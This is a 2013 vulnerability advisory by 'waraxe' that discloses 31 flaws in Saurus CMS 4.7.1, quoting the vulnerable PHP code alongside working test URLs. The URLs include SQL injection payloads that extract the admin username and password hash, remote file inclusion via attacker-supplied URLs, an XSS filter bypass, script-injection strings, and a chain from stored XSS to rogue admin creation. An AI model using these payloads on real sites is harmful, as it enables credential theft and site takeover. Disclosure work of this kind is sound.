[waraxe-2013-SA#106] - Multiple Vulnerabilities in Saurus CMS 4.7.1
================================================================================

Author: Janek Vind "waraxe"
Date: 14. July 2013
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-106.html


Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Web publishing system combining daily content management features with site
administration and development tools.

http://www.saurus.info/

Vulnerable was version 4.7.1 before 07. June 2013, older versions not tested:

http://www.saurus.info/version-history/


###############################################################################
1. Local File Inclusion in "admin/fckeditor_dialog_image.php"
###############################################################################

Reason:
 1. insufficient sanitization of user-supplied data
Attack vector:
 1. user-supplied parameter "dialog"
Preconditions:
 1. Logged in as Saurus CMS user
 2. At least one valid file ID must be known (can be bruteforced)

Php script "admin/fckeditor_dialog_image.php" line 101:
------------------------[ source code start ]----------------------------------
$object = new Objekt(array(
  'objekt_id' => (int)$site->fdat['file_id'],
  'on_sisu' => 1,
));
..
include_once('../js/fckeditor/editor/'.$site->fdat['dialog']);
------------------------[ source code end ]------------------------------------

Test (parameter "file_id" must be valid):

http://localhost/saurus471/admin/fckeditor_dialog_image.php?file_id=10572&dialog=../../../.htaccess

Result: contents of ".htaccess" file from Saurus CMS root directory will be
revealed, LFI confirmed.


###############################################################################
2. Local File Inclusion in "extensions/saurus4/captcha_image.php"
###############################################################################

Reason:
 1. uninitialized variable "$captcha"
Attack vector:
 1. user-supplied parameter "captcha"
Preconditions:
 1. PHP setting "register_globals = on"


Php script "extensions/saurus4/captcha_image.php" line 45:
------------------------[ source code start ]----------------------------------
switch ($captcha['image_type'])
{
  case 'gif':
    include_once($class_path.'lgpl/GotchaGIF.class.php');
    $img = new GotchaGIF($captcha['image_width'], $captcha['image_height']);
    break;
..
if($img->create())
{
  //apply effects
  foreach($captcha['effects'] as $effect)
  {
    $effect_name = $effect['name'];
    //echo $effect_name;
    include_once($class_path.'lgpl/'.$effect_name.'.class.php');
------------------------[ source code end ]------------------------------------

Test:

http://localhost/saurus471/extensions/saurus4/captcha_image.php?
captcha[image_type]=gif&captcha[image_width]=50&captcha[image_height]=50&
captcha[effects][0][name]=../waraxe

Result:

Warning: include_once(../../classes/lgpl/../waraxe.class.php) [function.include-once]:
failed to open stream: No such file or directory in
C:\apache_www\saurus471\extensions\saurus4\captcha_image.php on line 73

PHP error message above confirms LFI vulnerability.


###############################################################################
3. Local File Inclusion in "admin/edit.php"
###############################################################################

Reason:
 1. insufficient sanitization of user-supplied data
Attack vector:
 1. user-supplied parameter "extension_path"
Preconditions:
 1. Logged in as Saurus CMS user


Php script "admin/edit.php" line 76:
------------------------[ source code start ]----------------------------------
if($site->fdat['extension_path'])
{
  $actions_file = '..'.$site->fdat['extension_path'].'/actions.inc.php';
..
if (file_exists($actions_file)){
  include_once($actions_file);
------------------------[ source code end ]------------------------------------


###############################################################################
4. Remote File Inclusion in "map.php"
###############################################################################

Reason:
 1. insufficient sanitization of user-supplied data
Attack vector:
 1. user-supplied GET parameter "cmd"
Preconditions:
 1. Windows server


Php script "map.php" line 56:
------------------------[ source code start ]----------------------------------
$tmp_cmd=explode("/",$_GET['cmd']);
..
foreach($tmp_cmd as $t){

  // if the there is a .php in the URL then don't use aliases go directly to that file
  if(preg_match('/\.php$/i', $t) && file_exists($t) && !preg_match("#^\.\./#", $t))
..
    include($t);
------------------------[ source code end ]------------------------------------

On *nix servers this code above is secure enough, but things change in case of
Windows server - attacker is able to use backslashes, which leads to RFI.

Example attack using local file:

http://localhost/saurus471/map.php?cmd=..\..\..\..\test.php

Example attack using remote file:

http://localhost/saurus471/map.php?cmd=\\192.168.1.25\test.php


###############################################################################
5. Remote File Inclusion in "admin/change_config.php"
###############################################################################

Reason:
 1. uninitialized variable "$class_path"
Attack vector:
 1. user-supplied parameter "class_path"
Preconditions:
 1. PHP setting "register_globals = on"


Php script "admin/change_config.php" line 25:
------------------------[ source code start ]----------------------------------
global $class_path;
..
if(!isset($class_path)) {
  $class_path = "../classes/";
}
..
include_once($class_path."port.inc.php");
------------------------[ source code end ]------------------------------------

Test:

http://localhost/saurus471/admin/change_config.php?class_path=http://php.net/?


###############################################################################
6. Remote File Inclusion in "admin/repair_database.php"
###############################################################################

Reason:
 1. uninitialized variable "$class_path"
Attack vector:
 1. user-supplied parameter "class_path"
Preconditions:
 1. PHP setting "register_globals = on"


Php script "admin/repair_database.php" line 23:
------------------------[ source code start ]----------------------------------
global $class_path;

if(!isset($class_path)) {
  $class_path = "../classes/";
}

include_once($class_path."port.inc.php");
------------------------[ source code end ]------------------------------------

Test:

http://localhost/saurus471/admin/repair_database.php?class_path=http://php.net/?


###############################################################################
7. Remote File Inclusion in "admin/check_adminpage.php"
###############################################################################

Reason:
 1. uninitialized variable "$class_path"
Attack vector:
 1. user-supplied parameter "class_path"
Preconditions:
 1. PHP setting "register_globals = on"


Php script "admin/check_adminpage.php" line 29:
------------------------[ source code start ]----------------------------------
if(!isset($class_path)) { $class_path = "../classes/"; }

include($class_path."port.inc.php");
------------------------[ source code end ]------------------------------------

Test:

http://localhost/saurus471/admin/check_adminpage.php?class_path=http://php.net/?


###############################################################################
8. SQL Injection in "index.php"
###############################################################################

Reason:
 1. insufficient sanitization of user-supplied data
Attack vector:
 1. user-supplied GET parameter "pg"
Preconditions:
 1. PHP setting "magic_quotes_gpc = Off"


Php script "index.php" line 303:
------------------------[ source code start ]----------------------------------
if ($CMS_SETTINGS['switch_lang_enabled'] && !$cache_data && !$_GET['lang'] &&
 !$_GET['keel'] && (is_numeric($_GET['id']) || is_numeric($_GET['pg']))){
  $myid = $_GET['id'] ? $_GET['id'] : $_GET['pg'];
  $sql = "SELECT keel.extension FROM objekt LEFT JOIN keel ON
    keel.keel_id=objekt.keel WHERE objekt_id='".$myid."'";
  $sth = new SQL($sql);
  $mykeel = $sth->fetchsingle();
------------------------[ source code end ]------------------------------------

As seen above, user-submitted GET parameters "id" and "pg" are checked to be
numeric before using them in SQL query. If we analyze source code more closely,
then it appears to be not as secure as planned by programmer. Attacker can input
GET parameter "id" with value of "0" and GET parameter "pg" with SQL injection
string containing single quote. As parameter "id" is numeric, checking code will
be bypassed. Next line of code tests parameter "id" and because it is zero,
variable "$myid" will get value from parameter "pg". This leads to SQL Injection.

Test 1:

http://localhost/saurus471/?speed_debug=on&id=0&pg=123

Result: "Page was generated in 1.20000 seconds.", normal server response.

Test 2:

http://localhost/saurus471/?speed_debug=on&id=0&pg='+UNION+SELECT+SLEEP(5)%23

Result: "Page was generated in 6.17751 seconds.", delay observed, SQL Injection
confirmed.


###############################################################################
9. SQL Injection in "classes/sapi/function.init_search_results.php"
###############################################################################

Reason:
 1. insufficient sanitization of user-supplied data
Attack vector:
 1. user-supplied parameter "sites"
Preconditions: none


Php script "classes/sapi/function.init_search_results.php" line 27:
------------------------[ source code start ]----------------------------------
function smarty_function_init_search_results($params,&$smarty) {
..
  if(!isset($sites)) $sites = $site->fdat['sites'];
..
  $pre_search_explode=explode(",",strtolower(trim($sites)));
  foreach($pre_search_explode as $k=>$v){
    $pre_search_explode[$k]=trim($v);
  }
  $sql_keel = "SELECT keel_id FROM keel WHERE on_kasutusel=1 AND extension IN ('".implode("','",$pre_search_explode)."')";
..
  $sth = new SQL($sql_keel);
  while($r = $sth->fetch("ASSOC")){
    $keeled[]=$r['keel_id'];
------------------------[ source code end ]------------------------------------

As seen above, user-submitted parameter "sites" ends up used in SQL query
without proper sanitization, which leads to SQL Injection vulnerability.

Test 1:

http://localhost/saurus471/index.php?op=search&speed_debug=on&sites=waraxe

Result: "Page was generated in 1.18560 seconds.", normal server response.

Test 2:

http://localhost/saurus471/index.php?op=search&speed_debug=on&sites=')UNION+SELECT+SLEEP(5)%23

Result: "Page was generated in 6.22651 seconds.", delay observed, SQL Injection
confirmed.


###############################################################################
10. SQL Injection in "admin/error_log.php"
###############################################################################

Reason:
 1. insufficient sanitization of user-supplied data
Attack vector:
 1. user-supplied parameters "algus", "lopp", "err_type", "sortby" and "sort"
Preconditions:
 1. logged in as Saurus CMS admin


Php script "admin/error_log.php" line 63:
------------------------[ source code start ]----------------------------------
$algus_aeg = $site->fdat['algus']? $site->fdat['algus'] : date("d.m.Y",$start_d);
$lopp_aeg = $site->fdat['lopp']? $site->fdat['lopp'] : date("d.m.Y");
..
if ($algus_aeg) {
  $where_sql[] = " error_log.time_of_error>='".$site->db->ee_MySQL($algus_aeg)." 00:00' "; 
}
if ($lopp_aeg) {
  $where_sql[] = " error_log.time_of_error<='".$site->db->ee_MySQL($lopp_aeg)." 23:59' "; 
}
if ($site->fdat['err_type']) {
  $where_sql[] = " error_log.err_type = '".$site->fdat['err_type']."' ";
}
..
$where_str = sizeof($where_sql)>0 ? " WHERE ".join(" AND ",$where_sql) : '';
..
$site->fdat['sortby'] = $site->fdat['sortby'] ? $site->fdat['sortby'] : 'time_of_error';
$site->fdat['sort'] = $site->fdat['sort'] ? $site->fdat['sort'] : 'DESC';
..
if($site->fdat['sortby']){
  $order = " ORDER BY ".$site->fdat['sortby']." ".$site->fdat['sort'];
}
..
$sql = $site->db->prepare("SELECT DATE_FORMAT(time_of_error,'%d.%m.%y %T') AS time_of_errorf, error_log.*");
$sql .= $from_sql;
$sql .= $where_str;
$sql .= $order;
$sql .= $pagenumbers['limit_sql'];
..
$sth = new SQL($sql);
..
while ( $log = $sth->fetch() ) {
------------------------[ source code end ]------------------------------------

Test 1:

http://localhost/saurus471/admin/error_log.php?err_type='UNION+SELECT+1,1,1,1,@@version,1,1,1,1,1,1%23
http://localhost/saurus471/admin/error_log.php?algus=aa-'UNION+SELECT+1,1,1,1,@@version,1,1,1,1,1,1%23
http://localhost/saurus471/admin/error_log.php?lopp=aa-'+AND+0+UNION+SELECT+1,1,1,1,@@version,1,1,1,1,1,1%23

Result:

MySQL version info will be revealed

Test 2:

http://localhost/saurus471/admin/error_log.php?err_type='UNION+SELECT+1,1,1,1,CONCAT_WS(0x3a,username,password),1,1,1,1,1,1+FROM+users+WHERE+user_id=1%23
http://localhost/saurus471/admin/error_log.php?algus=aa-'UNION+SELECT+1,1,1,1,CONCAT_WS(0x3a,username,password),1,1,1,1,1,1+FROM+users+WHERE+user_id=1%23
http://localhost/saurus471/admin/error_log.php?lopp=aa-'+AND+0+UNION+SELECT+1,1,1,1,CONCAT_WS(0x3a,username,password),1,1,1,1,1,1+FROM+users+WHERE+user_id=1%23


Result:

Username and password hash of the Saurus CMS user with ID 1 will be revealed


###############################################################################
11. SQL Injection in "admin/extensions.php"
###############################################################################

Reason:
 1. insufficient sanitization of user-supplied data
Attack vector:
 1. user-supplied parameters "sortby" and "sort"
Preconditions:
 1. logged in as Saurus CMS admin


Php script "admin/extensions.php" line 297:
------------------------[ source code start ]----------------------------------
$site->fdat['sortby'] = $site->fdat['sortby'] ? $site->fdat['sortby'] : 'name';
$site->fdat['sort'] = $site->fdat['sort'] ? $site->fdat['sort'] : 'ASC';
..
if($site->fdat['sortby']){
  $order = " ORDER BY ".$site->fdat['sortby']." ".$site->fdat['sort'];
}
..
$sql = $site->db->prepare("SELECT DATE_FORMAT(version_date,'%d.%m.%Y') AS fversion_date, extensions.*");
$sql .= $from_sql;
$sql .= $order;
..
$sth = new SQL($sql);
..
while ( $ext = $sth->fetch() ) {
------------------------[ source code end ]------------------------------------

Test 1:

http://localhost/saurus471/admin/extensions.php?sortby=1

Result: normal server response, no additional delay.

Test 2:

http://localhost/saurus471/admin/extensions.php?sortby=SLEEP(5)%23

Result: additionial delay observed, SQL Injection confirmed.


###############################################################################
12. SQL Injection in "admin/profile_data.php"
###############################################################################

Reason:
 1. insufficient sanitization of user-supplied data
Attack vector:
 1. user-supplied parameters "sortby" and "sort"
Preconditions:
 1. logged in as Saurus CMS admin


Php script "admin/profile_data.php" line 521:
------------------------[ source code start ]----------------------------------
if($site->fdat['sortby']){
    $order = " ORDER BY ".$site->fdat['sortby']." ".$site->fdat['sort'];
  }
..
  $sql .= $from_sql;
  $sql .= $where;
  $sql .= $order;
  $sql .= $pagenumbers['limit_sql'];
  $sth = new SQL($sql);
..
  if($sth->rows){
..
  while($asset = $sth->fetch()){
------------------------[ source code end ]------------------------------------


###############################################################################
13. SQL Injection in "classes/user_html.inc.php"
###############################################################################

Reason:
 1. insufficient sanitization of user-supplied data
Attack vector:
 1. user-supplied parameters "sortby" and "sort"
Preconditions:
 1. logged in as Saurus CMS admin


Php script "classes/user_html.inc.php" line 313:
------------------------[ source code start ]----------------------------------
$order = " ORDER BY ".$site->fdat['sortby']." ".$site->fdat['sort'];
..
$sql = $site->db->prepare("SELECT users.* FROM users ");
$sql .= $join;
$sql .= $where;
$sql .= $order;
$sql .= $pagenumbers['limit_sql'];
..
$sth = new SQL($sql);
..
while($tmp = $sth->fetch()){
------------------------[ source code end ]------------------------------------

###############################################################################
14. SQL Injection in "admin/sys_sonad_loetelu.php"
###############################################################################

Reason:
 1. insufficient sanitization of user-supplied data
Attack vector:
 1. user-supplied parameter "sst_id"
Preconditions:
 1. logged in as Saurus CMS admin


Php script "admin/sys_sonad_loetelu.php" line 123:
------------------------[ source code start ]----------------------------------
$sst_id = ($site->fdat['sst_id'] ? $site->fdat['sst_id'] : $glossary_word_types[0]['sst_id']);

if(is_numeric($site->fdat['flt_keel']))
{
..
  $otsi = $otsi ? " (sys_sonad_kirjeldus.sona LIKE '%".$otsi."%' OR
  sys_sonad.sona LIKE '%".$otsi."%' OR sys_sonad.origin_sona LIKE 
  '%".$otsi."%' OR sys_sonad.sys_sona LIKE '%".$otsi."%' OR
  sys_sonad_kirjeldus.sys_sona LIKE '%".$otsi."%') " : " sys_sonad.sst_id=".$sst_id;
  $where_str = $site->db->prepare(" WHERE sys_sonad.keel=? AND ".$otsi." ",
    $keel_id,
    1
  );
..
$sql .= $where_str;
..
$sth = new SQL($sql);
..
while ( $mysona = $sth->fetch('ASSOC') )
{
  $words[] = $mysona;
}
------------------------[ source code end ]------------------------------------

Test 1:

http://localhost/saurus471/admin/sys_sonad_loetelu.php?flt_keel=1&sst_id=0+UNION+SELECT+@@version,1,1,1,1,1,1,1%23

Result:

MySQL version info will be revealed

Test 2:

http://localhost/saurus471/admin/sys_sonad_loetelu.php?flt_keel=1&sst_id=0+UNION+SELECT+CONCAT_WS(0x3a,username,password),1,1,1,1,1,1,1+FROM+users+WHERE+user_id=1%23

Result:

Username and password hash of the Saurus CMS user with ID 1 will be revealed


###############################################################################
15. SQL Injection in "admin/change_config.php"
###############################################################################

Reason:
 1. insufficient sanitization of user-supplied data
Attack vector:
 1. user-supplied parameter "timezone"
Preconditions:
 1. logged in as Saurus CMS admin


Php script "admin/change_config.php" line 153:
------------------------[ source code start ]----------------------------------
$q="update config set sisu='".$site->fdat['timezone']."' where nimi='time_zone'";
new SQL($q);
------------------------[ source code end ]------------------------------------


###############################################################################
16. Stored XSS in "admin/log.php"
###############################################################################

Reason:
 1. improper encoding or escaping of output
Attack vector:
 1. user-supplied parameter "user"
Preconditions:
 1.  1. "Enable site log" enabled (it is by default)


Php script "classes/site.class.php" line 538:
------------------------[ source code start ]----------------------------------
if($this->fdat["op"] == 'login' && $this->fdat["url"] && 
  $this->CONF['disable_form_based_login'] != "1") {
  $this->user = new User(array(
    user => $this->fdat["user"],
    pass => $this->fdat["pass"],
    "site" => &$this,
  ));
  $user_id = $this->user->user_id;

  if ($user_id) {
..
  else {
    # kirjuta logi
    new Log(array(
      'action' => 'log in',
      'component' => 'Users',
      'type' => 'NOTICE',
      'message' => "Unauthorized access to CMS:
      username '".$this->fdat["user"]."', IP: '".$_SERVER["REMOTE_ADDR"]."'",
    ));
------------------------[ source code end ]------------------------------------
 
As seen above, in case of failed login attempt site log entry will be created,
containing various information, including submitted username.
 

Php script "admin/log.php" line 265:
------------------------[ source code start ]----------------------------------
<?php foreach ($log_records as $log_record) { //printr($log_record); ?>
..
  <td><?=$log_record['message'];?></td>
------------------------[ source code end ]------------------------------------

We can see, that php script "admin/log.php", used by admins for sitelog view,
does not implement proper encoding or escaping of output, leading to Stored
XSS vulenrability. Because this specific XSS payload can be inserted by anonymous
user, but target victim is admin, then it has serious security impact and can
lead to site full compromise. Possible attack scenario: 1. Stored XSS insertion,
2. admin opens log.php, XSS payload steals CSRF token, 3. CSRF attack, new admin
account creation, 4. attacker logs in as new admin, game over ...

Test:

1. Issue GET request as below:

http://localhost/saurus471/admin/?op=login&url=1&user=<script>alert(123);</script>

2. Log in as Saurus CMS admin and open site log page:

http://localhost/saurus471/admin/log.php

Result: 

javascript alert box pops up, confirming Stored XSS vulnerability.


###############################################################################
17. Stored XSS in "admin/error_log.php"
###############################################################################

Reason:
 1. improper encoding or escaping of output
Preconditions:
 1. "Save PHP and MySQL errors into the database" enabled (it is by default)


Php script "classes/port.inc.php" line 150:
------------------------[ source code start ]----------------------------------
function saurusErrorHandler($errno, $errmsg, $filename, $linenum, $vars){
..
  if (!defined("SAVE_ERROR_LOG")){

    $res = @mysql_query("SELECT sisu FROM config WHERE nimi='save_error_log'");
    if ($res){
      list($tmp) = @mysql_fetch_array($res);
    }
    define("SAVE_ERROR_LOG", ($tmp ? 1:0));
  }


    if (SAVE_ERROR_LOG && !substr_count($errmsg, 'mysql_num_fields')){
      @mysql_query("INSERT INTO error_log (time_of_error, source, err_text, 
      err_type, domain, referrer, fdat_scope, ip, remote_user) VALUES (NOW(), 
      '".addslashes($filename." line ".$linenum)."', '".addslashes($errmsg)."',
      'PHP', '".addslashes($_SERVER['HTTP_HOST'])."', 
      '".addslashes($_SERVER['REQUEST_URI'])."', '".addslashes($serialized_fdat).
      "', '".$_SERVER['REMOTE_ADDR']."', '".addslashes($_SERVER['REMOTE_USER'])."')");
    }
   }

}

# Redefine error handler
$old_error_handler = set_error_handler("saurusErrorHandler");
------------------------[ source code end ]------------------------------------
 
As seen above, new PHP error handler is defined, which writes all PHP error
messages to error log in database.
 

Php script "admin/error_log.php" line 320:
------------------------[ source code start ]----------------------------------
<td width="60%"><?= $log['err_text'] ?></td>
------------------------[ source code end ]------------------------------------

We can see, that php script "admin/log.php", used by admins for error log view,
does not implement proper encoding or escaping of output, leading to Stored
XSS vulenrability. Because this specific XSS payload can be inserted by anonymous
user, but target victim is admin, then it has serious security impact and can
lead to site full compromise by similar scenario as described in previous case.

Test:

1. Issue GET request as below (MySQL Injection from one of the previous cases):

http://localhost/saurus471/?id=0&pg='<script>alert(123);</script>

2. Log in as Saurus CMS admin and open erro log page:

http://localhost/saurus471/admin/error_log.php

Result: 

javascript alert box pops up, confirming Stored XSS vulnerability.


###############################################################################
18. XSS protection bypass in "classes/port.inc.php"
###############################################################################

Php script "classes/port.inc.php" line 536:
------------------------[ source code start ]----------------------------------
if(strstr($_SERVER['REQUEST_URI'], $CMS_SETTINGS['wwwroot'].'/admin/') === false && (
  detect_xss_in_saurus_params($_SERVER['QUERY_STRING']) ||
  detect_xss_in_saurus_params($_SERVER['REQUEST_URI']) ||
  detect_xss_in_string($_SERVER['PHP_SELF']) ||
  detect_xss_in_saurus_params($_POST) ||
  detect_xss_in_saurus_params($_GET))
)
{
  header('Location: '.$CMS_SETTINGS['wwwroot'].'/index.php');
  exit;
}
------------------------[ source code end ]------------------------------------

We can see, that XSS detection functions are used against various input parameters
and in case of positive hit redirection to home page follows. There is custom
exclusion in place for administrative scripts and it's implementation is not
secure enough - attacker can use "$CMS_SETTINGS['wwwroot'].'/admin/'" string
in URI and XSS detection will be bypassed.
String for XSS detection bypass is "/saurus471/admin/" in examples below.
 
Test 1:

http://localhost/saurus471/kalender.php?month=<script>

Result: XSS detected, redirection follows

Test 2:

http://localhost/saurus471/kalender.php?/saurus471/admin/&month=<script>

Result: XSS not detected, no redirection


###############################################################################
19. Reflected XSS in "kalender.php"
###############################################################################

Reason:
 1. improper encoding or escaping of output
Attack vector:
 1. user-supplied parameters "form", "vorm", "form_field", "lahter" and "month"
Preconditions: none


Php script "kalender.php" line 50:
------------------------[ source code start ]----------------------------------
<script type="text/javascript">
//<!--
// Handle click of OK link 
function handleOK(selected_date) {
  if (opener && !opener.closed) {
    opener.document.<?if(isset($site->fdat['form'])){echo $site->fdat['form'];}
     else{ echo $site->fdat['vorm'];}?>.
     <?if(isset($site->fdat['form_field'])){echo $site->fdat['form_field'];}
     else{ echo $site->fdat['lahter'];}?>.value=selected_date; 
    opener.document.<?if(isset($site->fdat['form'])){echo $site->fdat['form'];}
    else{ echo $site->fdat['vorm'];}?>.
    <?if(isset($site->fdat['form_field'])){echo $site->fdat['form_field'];}
    else{ echo $site->fdat['lahter'];}?>.focus();
..
if($site->fdat['month']>=1&&$site->fdat['month']<=12)
{
  $month = $site->fdat['month'];
..
    defaultDate: new Date(<?=$year;?>, <?=$month;?> - 1, <?=$day;?>),
------------------------[ source code end ]------------------------------------

Tests:

http://localhost/saurus471/kalender.php?form=</script><script>alert(123);</script>
http://localhost/saurus471/kalender.php?vorm=</script><script>alert(123);</script>
http://localhost/saurus471/kalender.php?form_field=</script><script>alert(123);</script>
http://localhost/saurus471/kalender.php?lahter=</script><script>alert(123);</script>
http://localhost/saurus471/kalender.php?/saurus471/admin/&month=1</script><script>alert(123);</script>

Results: 

javascript alert boxes pop up, confirming Reflected XSS vulnerabilities.


###############################################################################
20. Reflected XSS in "editor/kalender.php"
###############################################################################

Reason:
 1. improper encoding or escaping of output
Attack vector:
 1. user-supplied parameters "form", "vorm", "form_field", "lahter" and "month"
Preconditions:
 1. must be logged in as user


Php script "editor/kalender.php" line 50:
------------------------[ source code start ]----------------------------------
<script type="text/javascript">
//<!--
// Handle click of OK link 
function handleOK(selected_date) {
  if (opener && !opener.closed) {
    opener.document.<?if(isset($site->fdat['form'])){echo $site->fdat['form'];}
     else{ echo $site->fdat['vorm'];}?>.
     <?if(isset($site->fdat['form_field'])){echo $site->fdat['form_field'];}
     else{ echo $site->fdat['lahter'];}?>.value=selected_date; 
    opener.document.<?if(isset($site->fdat['form'])){echo $site->fdat['form'];}
    else{ echo $site->fdat['vorm'];}?>.
    <?if(isset($site->fdat['form_field'])){echo $site->fdat['form_field'];}
    else{ echo $site->fdat['lahter'];}?>.focus();
..
if($site->fdat['month']>=1&&$site->fdat['month']<=12)
{
  $month = $site->fdat['month'];
..
    defaultDate: new Date(<?=$year;?>, <?=$month;?> - 1, <?=$day;?>),
------------------------[ source code end ]------------------------------------

Tests:

http://localhost/saurus471/editor/kalender.php?form=</script><script>alert(123);</script>
http://localhost/saurus471/editor/kalender.php?vorm=</script><script>alert(123);</script>
http://localhost/saurus471/editor/kalender.php?form_field=</script><script>alert(123);</script>
http://localhost/saurus471/editor/kalender.php?lahter=</script><script>alert(123);</script>
http://localhost/saurus471/editor/kalender.php?/saurus471/admin/&month=1</script><script>alert(123);</script>

Results: 

javascript alert boxes pop up, confirming Reflected XSS vulnerabilities.


###############################################################################
21. Reflected XSS in "admin/delete_log.php"
###############################################################################

Reason:
 1. improper encoding or escaping of output
Attack vector:
 1. user-supplied parameter "tbl"
Preconditions:
 1. logged in as Saurus CMS admin


Php script "admin/delete_log.php" line 176:
------------------------[ source code start ]----------------------------------
<input type="hidden" name="tbl" value="<?=$site->fdat['tbl']?>">
------------------------[ source code end ]------------------------------------

Test:

http://localhost/saurus471/admin/delete_log.php?tbl="><script>alert(123);</script>

Result: 

javascript alert box pops up, confirming Reflected XSS vulnerability.


###############################################################################
22. Reflected XSS in "admin/edit_adminpage.php"
###############################################################################

Reason:
 1. improper encoding or escaping of output
Attack vector:
 1. user-supplied parameters "id" and  "op"
Preconditions:
 1. logged in as Saurus CMS admin


Tests:

http://localhost/saurus471/admin/edit_adminpage.php?id="><script>alert(123);</script>
http://localhost/saurus471/admin/edit_adminpage.php?op="><script>alert(123);</script>

Results: 

javascript alert boxes pop up, confirming Reflected XSS vulnerabilities.


###############################################################################
23. Reflected XSS in "admin/edit_group.php"
###############################################################################

Reason:
 1. improper encoding or escaping of output
Attack vector:
 1. user-supplied parameter "group_id"
Preconditions:
 1. logged in as Saurus CMS admin


Tests:

http://localhost/saurus471/admin/edit_group.php?op=edit&group_id=1"><script>alert(123);</script>

Result: 

javascript alert boxes pop up, confirming Reflected XSS vulnerabilities.


###############################################################################
24. Reflected XSS in "admin/profile_data.php"
###############################################################################

Reason:
 1. improper encoding or escaping of output
Attack vector:
 1. user-supplied parameter "profile_id"
Preconditions:
 1. logged in as Saurus CMS admin


Php script "admin/profile_data.php" line 65:
------------------------[ source code start ]----------------------------------
print "<font color=red><b>Profile '".$site->fdat['profile_id']."' not found!</b></font>";
------------------------[ source code end ]------------------------------------

Test:

http://localhost/saurus471/admin/profile_data.php?profile_id=<script>alert(123);</script>

Result: 

javascript alert box pops up, confirming Reflected XSS vulnerability.


###############################################################################
25. Reflected XSS in "admin/edit_object.php"
###############################################################################

Reason:
 1. improper encoding or escaping of output
Attack vector:
 1. user-supplied parameter "profile_id"
Preconditions:
 1. logged in as Saurus CMS admin


Php script "admin/edit_object.php" line 101:
------------------------[ source code start ]----------------------------------
print "<font color=red><b>Profile '".$profile_id."' not found!</b></font>";
------------------------[ source code end ]------------------------------------

Test:

http://localhost/saurus471/admin/edit.php?tab=object&op=new&&tyyp_id=20&profile_id=,<script>alert(123);</script>

Result: 

javascript alert box pops up, confirming Reflected XSS vulnerability.


###############################################################################
26. Reflected XSS in "admin/edit_profile.php"
###############################################################################

Reason:
 1. improper encoding or escaping of output
Attack vector:
 1. user-supplied parameter "pid"
Preconditions:
 1. logged in as Saurus CMS admin


Php script "admin/edit_profile.php" line 997:
------------------------[ source code start ]----------------------------------
print "<font color=red><b>Profile '".$site->fdat['pid']."' not found!</b></font>";
------------------------[ source code end ]------------------------------------

Test:

http://localhost/saurus471/admin/edit_profile.php?op=edit&did=1&pid=<script>alert(123);</script>

Result: 

javascript alert box pops up, confirming Reflected XSS vulnerability.


###############################################################################
27. Reflected XSS in "admin/profiles.php"
###############################################################################

Reason:
 1. improper encoding or escaping of output
Attack vector:
 1. user-supplied parameters "profile_id", "source_table", "did"
Preconditions:
 1. logged in as Saurus CMS admin


Php script "admin/profiles.php" line 247:
------------------------[ source code start ]----------------------------------
<TD class="scms_dropdown_item"><a href="javascript:void(openpopup
  ('edit_profile.php?op=newdef&pid=<?= $site->fdat['profile_id'] ?>
..
<TD class="scms_dropdown_item"><a href="javascript:void(openpopup
  ('edit_profile.php?op=new&pid=<?= $site->fdat['profile_id']?>
  &source_table=<?= $site->fdat['source_table']?>
..
<TD nowrap><?if($site->fdat['profile_id']){?><a href="javascript:void(openpopup
  ('edit_profile.php?op=edit&pid=<?= $site->fdat['profile_id']?>
  &did=<?= $site->fdat['did']?>'
..
<TD><?if($site->fdat['profile_id']){?><a href="javascript:void(openpopup
  ('edit_profile.php?op=delete&pid=<?= $site->fdat['profile_id']?>
..
<TD><?if($site->fdat['profile_id']){?><a href="javascript:void(openpopup
  ('edit_profile.php?op=duplicate&pid=<?= $site->fdat['profile_id']?>
  &did=<?=$site->fdat['did']?>'
..
<TD><a href="<?= $site->self ?>?profile_id=<?= $site->fdat['profile_id']?>&op=sync"
------------------------[ source code end ]------------------------------------

Test:

http://localhost/saurus471/admin/profiles.php?profile_id="><script>alert(123);</script>
http://localhost/saurus471/admin/profiles.php?source_table="><script>alert(123);</script>
http://localhost/saurus471/admin/profiles.php?profile_id=z&did="><script>alert(123);</script>

Results: 

javascript alert boxes popping up, confirming Reflected XSS vulnerability.


###############################################################################
28. Reflected XSS in "admin/sys_alias.php"
###############################################################################

Reason:
 1. improper encoding or escaping of output
Attack vector:
 1. user-supplied parameters "flt_keel" and "keel_id"
Preconditions:
 1. logged in as Saurus CMS admin


Test:

http://localhost/saurus471/admin/sys_alias.php?flt_keel="><script>alert(123);</script>
http://localhost/saurus471/admin/sys_alias.php?keel_id="><script>alert(123);</script>

Result: 

javascript alert boxes popping up, confirming Reflected XSS vulnerability.


###############################################################################
29. Reflected XSS in "admin/sys_sonad_loetelu.php"
###############################################################################

Reason:
 1. improper encoding or escaping of output
Attack vector:
 1. user-supplied parameters "flt_keel"
Preconditions:
 1. logged in as Saurus CMS admin


Test:

http://localhost/saurus471/admin/sys_sonad_loetelu.php?flt_keel=</script><script>alert(123);</script>

Result: 

javascript alert box pops up, confirming Reflected XSS vulnerability.


###############################################################################
30. Reflected XSS in "admin/user_management.php"
###############################################################################

Reason:
 1. improper encoding or escaping of output
Attack vector:
 1. all user-supplied parameters (excluding "selected_devices")
Preconditions:
 1. logged in as Saurus CMS admin

Php script "admin/user_management.php" line 138:
------------------------[ source code start ]----------------------------------
foreach($site->fdat as $fdat_field=>$fdat_value) { 
  if($fdat_field != 'selected_devices'){
    echo '<input type=hidden id="selectform_'.$fdat_field.'" 
      name="'.$fdat_field.'" value="'.$fdat_value.'">';
  } 
------------------------[ source code end ]------------------------------------

Test:

http://localhost/saurus471/admin/user_management.php?foobar="><script>alert(123);</script>

Result: 

javascript alert box pops up, confirming Reflected XSS vulnerability.


###############################################################################
31. Reflected XSS in "admin/permissions.php"
###############################################################################

Reason:
 1. improper encoding or escaping of output
Attack vector:
 1. user-supplied parameters "selected_group", "user_id", "group_id" and "role_id"
Preconditions:
 1. logged in as Saurus CMS admin

Php script "admin/permissions.php" line 229:
------------------------[ source code start ]----------------------------------
<input type=hidden id="selectform_selected_group" name="selected_group" 
value="<?=$site->fdat['selected_group']?>">
<input type=hidden id="selectform_user_id" name="user_id" 
value="<?=$site->fdat['user_id']?>">
<input type=hidden id="selectform_group_id" name="group_id" 
value="<?=$site->fdat['group_id']?>">
------------------------[ source code end ]------------------------------------

Test:

http://localhost/saurus471/admin/permissions.php?selected_group="><script>alert(123);</script>
